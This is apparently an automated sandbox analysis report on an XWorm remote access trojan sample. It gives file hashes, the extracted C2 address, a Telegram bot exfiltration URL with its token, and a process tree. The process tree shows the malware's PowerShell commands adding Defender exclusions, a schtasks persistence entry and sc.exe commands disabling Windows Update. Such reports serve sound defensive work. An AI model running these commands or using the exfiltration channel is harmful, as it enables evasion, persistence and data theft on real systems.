Analysis

  • max time kernel
    216s
  • max time network
    223s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    01-08-2024 21:00

General

  • Target

    aznuril.exe

  • Size

    35.0MB

  • MD5

    71a8a8297116bb9e6a527c82db38ae0c

  • SHA1

    f42ad3f6636c5d987939033d9cb09b657fc2a76b

  • SHA256

    b6a02bede9af95adb28ce056584dfed53a2d70a8bd7b76c919392359139d39f6

  • SHA512

    f84b9b160f6cbb5b1ad7947c0ebac7cc7b24d379b3136f7ffa6becfe3bfedcda2a7008779b25334b1572a9e6f6854ec727f57b493d913cbf59a33a90e4200db9

  • SSDEEP

    786432:vkudQtsmW+e5RU2j6+s7LWB75zuk2q9TqyMeLBSQryklN:vjdQt9W+eHU2qHWB75ikfNNBShWN

Malware Config

Extracted

Family

xworm

C2

heart-debian.gl.at.ply.gg:47573

Attributes
  • Install_directory

    %AppData%

  • install_file

    system32.exe

  • telegram

    https://api.telegram.org/bot7458595634:AAEEmxZd7rBIYX3YZTRCO1t9uU7_yLyhcaw/sendMessage?chat_id=1473354298

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Detect Xworm Payload 5 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Stops running service(s) 4 TTPs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 5 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 26 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 54 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\aznuril.exe
    "C:\Users\Admin\AppData\Local\Temp\aznuril.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2388
    • C:\Users\Admin\AppData\Local\Temp\DXXPRIVATE.exe
      "C:\Users\Admin\AppData\Local\Temp\DXXPRIVATE.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2188
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\DXXPRIVATE.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:708
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DXXPRIVATE.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1608
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\system32.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2748
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system32.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2736
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "system32" /tr "C:\Users\Admin\AppData\Roaming\system32.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2776
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" http://soundcloud.com/
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:536
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:536 CREDAT:275457 /prefetch:2
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:1044
      • C:\Windows\System32\sc.exe
        "C:\Windows\System32\sc.exe" config wuauserv start=auto
        3⤵
        • Launches sc.exe
        PID:2840
      • C:\Windows\System32\sc.exe
        "C:\Windows\System32\sc.exe" start wuauserv
        3⤵
        • Launches sc.exe
        PID:2980
      • C:\Windows\System32\sc.exe
        "C:\Windows\System32\sc.exe" stop wuauserv
        3⤵
        • Launches sc.exe
        PID:2808
      • C:\Windows\System32\sc.exe
        "C:\Windows\System32\sc.exe" config wuauserv start=disabled
        3⤵
        • Launches sc.exe
        PID:2608
    • C:\Users\Admin\AppData\Local\Temp\DXX SOFTS PRIVATE.exe
      "C:\Users\Admin\AppData\Local\Temp\DXX SOFTS PRIVATE.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2968
      • C:\Users\Admin\AppData\Local\Temp\DXX SOFTS PRIVATE.exe
        "C:\Users\Admin\AppData\Local\Temp\DXX SOFTS PRIVATE.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:2912
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {02F37903-54AF-4CF8-987C-BC0A0A2FFB66} S-1-5-21-3294248377-1418901787-4083263181-1000:FMEDFXFE\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1872
    • C:\Users\Admin\AppData\Roaming\system32.exe
      C:\Users\Admin\AppData\Roaming\system32.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2916
    • C:\Users\Admin\AppData\Roaming\system32.exe
      C:\Users\Admin\AppData\Roaming\system32.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1976
    • C:\Users\Admin\AppData\Roaming\system32.exe
      C:\Users\Admin\AppData\Roaming\system32.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2308

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F59A01A8B782D93EA6991BC172CEFFB1

    Filesize

    867B

    MD5

    c5dfb849ca051355ee2dba1ac33eb028

    SHA1

    d69b561148f01c77c54578c10926df5b856976ad

    SHA256

    cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b

    SHA512

    88289cdd2c2dd1f5f4c13ab2cf9bc601fc634b5945309bedf9fc5b96bf21697b4cd6da2f383497825e02272816befbac4f44955282ffbbd4dd0ddc52281082da

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    b8c663748645a6317dca379bd812fc12

    SHA1

    dd351352c3607f17cf1293d5c308e21b9ada3665

    SHA256

    f26488debdaaa1026028532ca97180408ffc34195183bbdb4b99716184a3a78b

    SHA512

    e034e50a9cad3524616c8b76d6017b1f23dcbaf5aa6a976b5df80f47ff9ae059b809f4936b1a4b839fbf04201022fd5fab3436ce37ccb01211cc417e0d24d326

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    672fff40646c399833ee62668f774b08

    SHA1

    873d02c4e0a5985a9a782b71233878c694e60b7a

    SHA256

    c783a9635a846a4daa0aa5d61d560270efacc1b224bcfb52cb33e8aa48afb539

    SHA512

    48af2722d4c6228634b050774bb525497aec591269aff10c170cfade3c7a1c17d928c03e2a2f3802337ce01d51756fddd12a9941fbee31dd98f7fa2453f66aa9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    e434cf1dea6bb44cdf9774e09a1a02a9

    SHA1

    3598f6ea27bc0c661f83a5552da1ffc15aba5956

    SHA256

    8fe9acd72b5f8f5a5943f92c9b2dab8d86fa7cc84948e0f69748e836ec3b22af

    SHA512

    b4f1db6ca69dbf1c3ecfebcb99f4829ba9b883bd1e4350e246f850cd41c99f060d22e091e5c60b76e426b73aa3339081aa22f4ec2ee62cdf320ea835697e6bae

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    9a22d4e0bed77ad1af7ffb882296ba70

    SHA1

    2796edaa79547413d40b1a8812d92bc48d9a24f8

    SHA256

    51e1845866740a98b5af689a66a6f881cef8d8c8c66a5cb3c603c063a6885bfa

    SHA512

    b69d0b7a8ae6a55bf558f1736da982c9d9bddb84ab37d108eae556dcc6e8379bfc77159315cdb00262cf3795c85bf73b415df6f226958975eedba3f9fc0bb537

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    a28e25b7a7fb99eae77a4c1f7a7dbf8b

    SHA1

    81bb9305d5e5a1f6bf3fa69de852cc709385423c

    SHA256

    e5e404e0ab56d9ce72fe5569c78d655a9d19249b24b09f8f45074c5816858944

    SHA512

    107db2b535587acbb2e66b756dd256bef2ce0f16d85d013ddc3ad11bde86c0dcc0a36672db1e97c43785284852cf2c7cfe0cfe7dbdfcefb6bb9ad8f2f0ce178e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    5c2f17039ac8273d18190172f05a7897

    SHA1

    947210a039a8223f4a4a7d12091a598cd7a4d6a5

    SHA256

    3e958ce6c414fd0d42b6875f6791d87559e005635f63f56b2fcf6f993f79fb71

    SHA512

    87510e872159a44048412c4181abd71852072da7070164c1a8818c2f575766b5dfe9b1ff3a427d9dd532ab0e315b07d33f72c99b1ddc8bbe9d3c62a419f31d0c

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    96e7a8ee265cdee6c6dedb44852330ec

    SHA1

    f616262de8bf7034cdaf001017dffb35bb2c699f

    SHA256

    8eaeba44560fbd284eed89de7986053cb2f72c74bf5e2a7f0cf9f13eaf9e4a03

    SHA512

    d895709a63a32a690c438bae9d4ce8b5664741e29fca3c76e8b492e3ae4ca5a3d49a9f5e4e088a6b8bd33c2363850e34c339799ea0eeb16e49a044fb30781bb9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    3b6b96578248b400091a10a6a64bfc91

    SHA1

    dfd24c0fb0712c3c544f4e394ce242909736c467

    SHA256

    c7ea6ac7fe162238da75c7c64f8c81387cd9083a2fe9042b8e5051057ed577d1

    SHA512

    7fcc0a3b16249b99108af9ee16e84acc80f6775d4113e5f33a5aede5efa942529a77747594ee83cc05679a31a3e58a2868293ad574e0322144ae3355b0454fbb

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    7583f68e6e6f124ebbb023913f5e1713

    SHA1

    49821c423f5066ed3f9452a2a211992ae864f648

    SHA256

    3e22d5b3696cda601fc69b9e24780fbea70741a72418d8c25a89895ed0e71388

    SHA512

    f0731d3fab91c22ffa36e38b5027eb8e48ead08d6bede07acc69a88b34a7bfd437c59cc1101d56d336d354d108e2ad806e749166ff7fc75db2c8169abac573e1

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    96b3df6b87bbe8756be06b1f3a2eee06

    SHA1

    1fe431b66015be10f8581ddc57ad35f5f4759af1

    SHA256

    70b82ff664c2e5830a8b2140433cb3a6479b1454ac672f2c664b2dcce28d4bd8

    SHA512

    6d07df83ad4959a87e00a73d3072af23d17f189162c60d6b52b93f5810cb4e1a1e287bb6d7f7925ec5061f98766e1faea16b69d57b7dc577660843ef2dabee6c

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F59A01A8B782D93EA6991BC172CEFFB1

    Filesize

    242B

    MD5

    1d5026ceaf392f6ca8e7bbe373463109

    SHA1

    6ed6f36e26d2d5028d33618f01e082974cc08311

    SHA256

    d5ea14766daa3b3911b6e8e6e101e986f171248f6c272b3a78675929b8aaf8b8

    SHA512

    670fa3dc32620c3eff15b799d380e371e8d4a1d71387ab8a5cca1355e84dac6d03181b6a0d4760efdbf14554c7bff2e604b38cfe9bc45ec488f4f414dfd181cb

  • C:\Users\Admin\AppData\Local\Temp\Cab6135.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\Tar6148.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Local\Temp\_MEI29682\python311.dll

    Filesize

    5.5MB

    MD5

    65e381a0b1bc05f71c139b0c7a5b8eb2

    SHA1

    7c4a3adf21ebcee5405288fc81fc4be75019d472

    SHA256

    53a969094231b9032abe4148939ce08a3a4e4b30b0459fc7d90c89f65e8dcd4a

    SHA512

    4db465ef927dfb019ab6faec3a3538b0c3a8693ea3c2148fd16163bf31c03c899dfdf350c31457edf64e671e3cc3e46851f32f0f84b267535bebc4768ef53d39

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    e5ebb726d426cb76b0ebc690278b7222

    SHA1

    7812c0cb22f7c6dbf2b17d24d0f6a38d0ec28aa6

    SHA256

    535b37bda71ef51e08580e31830b983a1499c2799685f16948ca0649cebfc8e1

    SHA512

    6286a176b35659d4aff486c05b79c778fb4d23347dba7593ca4eb815408305f0f8f41cb29db897a5b6e6982a4b6f6d657cfba0ec057a286a8b86fde48e23c428

  • \Users\Admin\AppData\Local\Temp\DXX SOFTS PRIVATE.exe

    Filesize

    34.9MB

    MD5

    75d32588eb6d63a219979c4d426f6b24

    SHA1

    7418f040c081e3a3fa941da7b2596c53eb14e13f

    SHA256

    25d1dad3e5662b215e5b05f51db5e24714fdd2b5db9c424d7e11677be0c32808

    SHA512

    c3d20730fa5e4e5558b535069ea45df0d30638e49a33dff83662efd895ea519836291581b85f4b21ce84d2aece344a462ecb03cfb497fab9912a83f4f82d43e9

  • \Users\Admin\AppData\Local\Temp\DXXPRIVATE.exe

    Filesize

    77KB

    MD5

    0023d5028225136e000201652d675318

    SHA1

    2c0c6c975e263d88225916db67f4dff50c577380

    SHA256

    fc975db05fc20acc0c6bfefc517f9c54487857c0332877036408035a95677a68

    SHA512

    c842faccb9de56d38de1112799fb9bbead47fdbeaf70f1d0159dd0a6516b848040d33793163a1fbb6212fff8ad17925c67720c900c36b218cdd349a2dd08087f

  • memory/708-309-0x0000000001EC0000-0x0000000001EC8000-memory.dmp

    Filesize

    32KB

  • memory/708-308-0x000000001B730000-0x000000001BA12000-memory.dmp

    Filesize

    2.9MB

  • memory/1608-316-0x0000000002860000-0x0000000002868000-memory.dmp

    Filesize

    32KB

  • memory/1608-315-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

    Filesize

    2.9MB

  • memory/1976-338-0x0000000000E30000-0x0000000000E4A000-memory.dmp

    Filesize

    104KB

  • memory/2188-12-0x0000000000860000-0x000000000087A000-memory.dmp

    Filesize

    104KB

  • memory/2188-1058-0x00000000022B0000-0x00000000022BE000-memory.dmp

    Filesize

    56KB

  • memory/2308-340-0x0000000001260000-0x000000000127A000-memory.dmp

    Filesize

    104KB

  • memory/2388-10-0x0000000000400000-0x0000000002700000-memory.dmp

    Filesize

    35.0MB

  • memory/2916-335-0x00000000001C0000-0x00000000001DA000-memory.dmp

    Filesize

    104KB